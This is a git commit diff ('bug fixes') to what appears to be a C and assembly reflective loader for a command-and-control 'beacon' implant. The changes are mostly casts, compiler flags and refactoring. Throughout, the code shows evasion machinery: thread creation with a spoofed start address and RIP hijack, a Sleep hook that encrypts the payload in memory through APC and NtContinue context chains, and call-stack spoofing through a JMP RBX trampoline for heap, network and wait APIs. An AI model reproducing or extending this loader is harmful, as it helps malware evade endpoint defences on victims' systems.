bug fixes

kyleavery · Sep 28, 2023 · 6ab821a · 6ab821a
1 parent 2682c32
commit 6ab821a
Show file tree

Hide file tree

Showing 8 changed files with 52 additions and 528 deletions.
diff --git a/Makefile b/Makefile
@@ -4,18 +4,19 @@ OUT         := bin
 
 CFLAGS      := $(CFLAGS) -Os -fno-asynchronous-unwind-tables -nostdlib 
 CFLAGS      := $(CFLAGS) -fno-ident -fpack-struct=8 -falign-functions=1
-CFLAGS      := $(CFLAGS) -s -ffunction-sections -falign-jumps=1 -w
-CFLAGS      := $(CFLAGS) -falign-labels=1 -fPIC -Wl,-Tsrc/link.ld
+CFLAGS      := $(CFLAGS) -s -ffunction-sections -falign-jumps=1 -Wall
+CFLAGS      := $(CFLAGS) -Werror -falign-labels=1 -fPIC -Wno-array-bounds
 LFLAGS      := $(LFLAGS) -Wl,-s,--no-seh,--enable-stdcall-fixup
+LFLAGS 		:= $(LFLAGS) -Wl,--image-base=0,-Tsrc/link.ld
 
 
 default: clean aceldr
 release: default zip
 
 aceldr:
-	@ nasm -f win64 src/asm/start.asm -o $(OUT)/start.tmp.o
-	@ nasm -f win64 src/asm/misc.asm -o $(OUT)/misc.tmp.o
-	@ nasm -f win64 src/asm/spoof.asm -o $(OUT)/spoof.tmp.o
+	@ nasm -Werror=all -f win64 src/asm/start.asm -o $(OUT)/start.tmp.o
+	@ nasm -Werror=all -f win64 src/asm/misc.asm -o $(OUT)/misc.tmp.o
+	@ nasm -Werror=all -f win64 src/asm/spoof.asm -o $(OUT)/spoof.tmp.o
 	@ $(CC_X64) src/*.c $(OUT)/start.tmp.o $(OUT)/misc.tmp.o $(OUT)/spoof.tmp.o src/hooks/*.c -o $(OUT)/$(NAME).x64.exe $(CFLAGS) $(LFLAGS) -I.
 	@ python3 scripts/extract.py -f $(OUT)/$(NAME).x64.exe -o $(OUT)/$(NAME).x64.bin
 	@ rm $(OUT)/*.tmp.o 2>/dev/null || true

diff --git a/src/ace.c b/src/ace.c
@@ -38,7 +38,7 @@ typedef struct
 } REG, *PREG;
 
 #ifndef PTR_TO_HOOK
-#define PTR_TO_HOOK( a, b )    U_PTR( U_PTR( a ) + OFFSET( b ) - OFFSET( Stub ) )
+#define PTR_TO_HOOK( a, b )    C_PTR( U_PTR( a ) + OFFSET( b ) - OFFSET( Stub ) )
 #endif
 
 #ifndef memcpy
@@ -72,19 +72,18 @@ SECTION( B ) NTSTATUS resolveLoaderFunctions( PAPI pApi )
     return STATUS_SUCCESS;
 };
 
-SECTION( B ) REG calculateRegions( VOID )
+SECTION( B ) VOID calculateRegions( PREG pReg )
 {
-    REG         Reg = { 0 };
     SIZE_T      ILn = 0;   
 
-    Reg.Dos = C_PTR( G_END() );
-    Reg.NT  = C_PTR( U_PTR( Reg.Dos ) + Reg.Dos->e_lfanew );
+    pReg->Dos = C_PTR( G_END() );
+    pReg->NT  = C_PTR( U_PTR( pReg->Dos ) + pReg->Dos->e_lfanew );
 
-    ILn = ( ( ( Reg.NT->OptionalHeader.SizeOfImage ) + 0x1000 - 1 ) &~( 0x1000 - 1 ) );
-    Reg.Exec = ( ( ( G_END() - OFFSET( Stub ) ) + 0x1000 - 1 ) &~ ( 0x1000 - 1 ) );
-    Reg.Full = ILn + Reg.Exec;
-    
-    return Reg;
+    ILn = ( ( ( pReg->NT->OptionalHeader.SizeOfImage ) + 0x1000 - 1 ) &~( 0x1000 - 1 ) );
+    pReg->Exec = ( ( ( G_END() - OFFSET( Stub ) ) + 0x1000 - 1 ) &~ ( 0x1000 - 1 ) );
+    pReg->Full = ILn + pReg->Exec;
+
+    return;
 };
 
 SECTION( B ) VOID copyStub( PVOID buffer )
@@ -137,7 +136,7 @@ SECTION( B ) VOID installHooks( PVOID map, PVOID buffer, PIMAGE_NT_HEADERS nt )
 
     if( Dir->VirtualAddress )
     {
-        LdrProcessRel( C_PTR( map ), C_PTR( U_PTR( map ) + Dir->VirtualAddress ), nt->OptionalHeader.ImageBase );
+        LdrProcessRel( C_PTR( map ), C_PTR( U_PTR( map ) + Dir->VirtualAddress ), C_PTR( nt->OptionalHeader.ImageBase ) );
     };
 };
 
@@ -153,8 +152,8 @@ SECTION( B ) VOID fillStub( PVOID buffer, HANDLE heap, SIZE_T region )
 SECTION( B ) VOID executeBeacon( PVOID entry )
 {
     DLLMAIN_T Ent = entry;
-    Ent( OFFSET( Start ), 1, NULL );
-    Ent( OFFSET( Start ), 4, NULL );
+    Ent( ( HMODULE )OFFSET( Start ), 1, NULL );
+    Ent( ( HMODULE )OFFSET( Start ), 4, NULL );
 };
 
 SECTION( B ) VOID Loader( VOID ) 
@@ -172,7 +171,7 @@ SECTION( B ) VOID Loader( VOID )
 
     if( resolveLoaderFunctions( &Api ) == STATUS_SUCCESS )
     {
-        Reg = calculateRegions();
+        calculateRegions( &Reg );
         Status = Api.ntdll.NtAllocateVirtualMemory( ( HANDLE )-1, &MemoryBuffer, 0, &Reg.Full, MEM_COMMIT, PAGE_READWRITE );
         if( Status == STATUS_SUCCESS )
         {
@@ -226,16 +225,15 @@ SECTION( B ) NTSTATUS resolveAceFunctions( PAPI pApi )
 SECTION( B ) NTSTATUS createBeaconThread( PAPI pApi, PHANDLE thread )
 {
     BOOL Suspended = TRUE;
-    LPTHREAD_START_ROUTINE StartAddress = pApi->ntdll.RtlUserThreadStart + 0x21;
+    PVOID StartAddress = C_PTR( pApi->ntdll.RtlUserThreadStart + 0x21 );
 
-    return pApi->ntdll.RtlCreateUserThread( ( HANDLE )-1, NULL, Suspended, 0, 0, 0, StartAddress, NULL, thread, NULL );
+    return pApi->ntdll.RtlCreateUserThread( ( HANDLE )-1, NULL, Suspended, 0, 0, 0, ( PUSER_THREAD_START_ROUTINE )StartAddress, NULL, thread, NULL );
 };
 
 SECTION( B ) VOID Ace( VOID )
 {
     API         Api;
     CONTEXT     Ctx;
-    NTSTATUS    Status;
     HANDLE      Thread;
 
     RtlSecureZeroMemory( &Api, sizeof( Api ) );
@@ -247,7 +245,7 @@ SECTION( B ) VOID Ace( VOID )
         {
             Ctx.ContextFlags = CONTEXT_CONTROL;
             Api.ntdll.NtGetContextThread( Thread, &Ctx );
-            Ctx.Rip = C_PTR( Loader );
+            Ctx.Rip = ( DWORD64 )C_PTR( Loader );
 
             Api.ntdll.NtSetContextThread( Thread, &Ctx );
             Api.ntdll.NtResumeThread( Thread, NULL );

diff --git a/src/hooks/delay.c b/src/hooks/delay.c
@@ -131,7 +131,7 @@ SECTION( D ) NTSTATUS queueAPCs( PAPI pApi, PCONTEXT* contexts, HANDLE hThread )
     NTSTATUS Status;
     for( int i = 9; i >= 0; i-- )
     {
-        Status = pApi->ntdll.NtQueueApcThread( hThread, pApi->ntdll.NtContinue, contexts[i], NULL, NULL );
+        Status = pApi->ntdll.NtQueueApcThread( hThread, C_PTR( pApi->ntdll.NtContinue ), contexts[i], NULL, NULL );
         if( Status != STATUS_SUCCESS )
         {
             break;
@@ -147,7 +147,7 @@ SECTION( D ) VOID initContexts( PAPI pApi, PCONTEXT* contexts )
 
     for( int i = 13; i >= 0; i-- )
     {
-        contexts[i] = ( PCONTEXT )SPOOF( pApi->ntdll.RtlAllocateHeap, pApi->hNtdll, pApi->szNtdll, hProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
+        contexts[i] = ( PCONTEXT )C_PTR( SPOOF( pApi->ntdll.RtlAllocateHeap, pApi->hNtdll, pApi->szNtdll, hProcessHeap, C_PTR( HEAP_ZERO_MEMORY ), C_PTR( sizeof( CONTEXT ) ) ) );
         if( i < 10 )
         {
             *contexts[i] = *contexts[11];
@@ -233,7 +233,7 @@ SECTION( D ) VOID delayExec( PAPI pApi )
 {
     #define CHECKERR( status )  if( status != STATUS_SUCCESS ) { goto cleanup; };
 
-    NTSTATUS    Status  = NULL;
+    NTSTATUS    Status  = 0;
     HANDLE      SyncEvt = NULL;
     HANDLE      WaitThd = NULL;
     HANDLE      OrigThd = NULL;
@@ -447,7 +447,7 @@ SECTION( D ) NTSTATUS resolveSleepHookFunctions( PAPI pApi )
     };
 
     pApi->ntdll.RtlInitAnsiString( &Str, C_PTR( OFFSET( "SystemFunction032" ) ) );
-    pApi->ntdll.LdrGetProcedureAddress( pApi->hAdvapi, &Str, 0, &pApi->advapi.SystemFunction032 );
+    pApi->ntdll.LdrGetProcedureAddress( pApi->hAdvapi, &Str, 0, ( PVOID* )&pApi->advapi.SystemFunction032 );
 
     RtlSecureZeroMemory( &Uni, sizeof( Uni ) );
     RtlSecureZeroMemory( &Str, sizeof( Str ) );
@@ -470,7 +470,7 @@ SECTION( D ) VOID Sleep_Hook( DWORD dwMilliseconds )
     API Api;
     RtlSecureZeroMemory( &Api, sizeof( Api ) );
 
-    Api.CFG            = NULL;
+    Api.CFG            = 0;
     Api.dwMilliseconds = dwMilliseconds;
     Api.Buffer         = C_PTR( ( ( PSTUB ) OFFSET( Stub ) )->Region );
     Api.Length         = U_PTR( ( ( PSTUB ) OFFSET( Stub ) )->Size );

diff --git a/src/hooks/spoof.c b/src/hooks/spoof.c
@@ -31,7 +31,7 @@ SECTION( D ) PVOID RtlAllocateHeap_Hook( PVOID heapHandle, ULONG flags, SIZE_T s
 
     Api.ntdll.RtlAllocateHeap = FindFunction( hNtdll, H_API_RTLALLOCATEHEAP );
 
-    return SPOOF( Api.ntdll.RtlAllocateHeap, hNtdll, Size, heapHandle, flags, size );
+    return SPOOF( Api.ntdll.RtlAllocateHeap, hNtdll, Size, heapHandle, C_PTR( U_PTR( flags ) ), C_PTR( U_PTR ( size ) ) );
 };
 
 SECTION( D ) LPVOID HeapAlloc_Hook( HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes )
@@ -53,7 +53,7 @@ SECTION( D ) HINTERNET InternetConnectA_Hook( HINTERNET hInternet, LPCSTR lpszSe
 
     Api.net.InternetConnectA = FindFunction( hNet, H_API_INTERNETCONNECTA );
 
-    return SPOOF( Api.net.InternetConnectA, hNet, Size, hInternet, lpszServerName, nServerPort, lpszUserName, lpszPassword, dwService, dwFlags, dwContext );
+    return ( HINTERNET )SPOOF( Api.net.InternetConnectA, hNet, Size, hInternet, C_PTR( lpszServerName ), C_PTR( U_PTR( nServerPort ) ), C_PTR( lpszUserName ), C_PTR( lpszPassword ), C_PTR( U_PTR ( dwService ) ), C_PTR( U_PTR( dwFlags ) ), C_PTR( U_PTR( dwContext ) ) );
 };
 
 SECTION( D ) NTSTATUS NtWaitForSingleObject_Hook( HANDLE handle, BOOLEAN alertable, PLARGE_INTEGER timeout )
@@ -70,5 +70,5 @@ SECTION( D ) NTSTATUS NtWaitForSingleObject_Hook( HANDLE handle, BOOLEAN alertab
 
     Api.ntdll.NtWaitForSingleObject = FindFunction( hNtdll, H_API_NTWAITFORSINGLEOBJECT );
 
-    return SPOOF( Api.ntdll.NtWaitForSingleObject, hNtdll, Size, handle, alertable, timeout );
+    return ( NTSTATUS )U_PTR( SPOOF( Api.ntdll.NtWaitForSingleObject, hNtdll, Size, handle, C_PTR( U_PTR( alertable ) ), timeout ) );
 };
diff --git a/src/include.h b/src/include.h
@@ -41,10 +41,16 @@ typedef struct __attribute__(( packed ))
     HANDLE    Heap;
 } STUB, *PSTUB ;
 
-static ULONG_PTR Start( VOID );
-static ULONG_PTR GetIp( VOID );
-static ULONG_PTR Stub( VOID );
-static ULONG_PTR Spoof( VOID );
+typedef struct {
+    const void* trampoline;     // always JMP RBX
+    void* function;             // Target Function
+    void* rbx;                  // Placeholder
+} PRM, *PPRM;
+
+extern ULONG_PTR Start( VOID );
+extern ULONG_PTR GetIp( VOID );
+extern ULONG_PTR Stub( VOID );
+extern PVOID     Spoof( PVOID, PVOID, PVOID, PVOID, PPRM, PVOID, PVOID, PVOID, PVOID, PVOID );
 
 
 #include "util.h"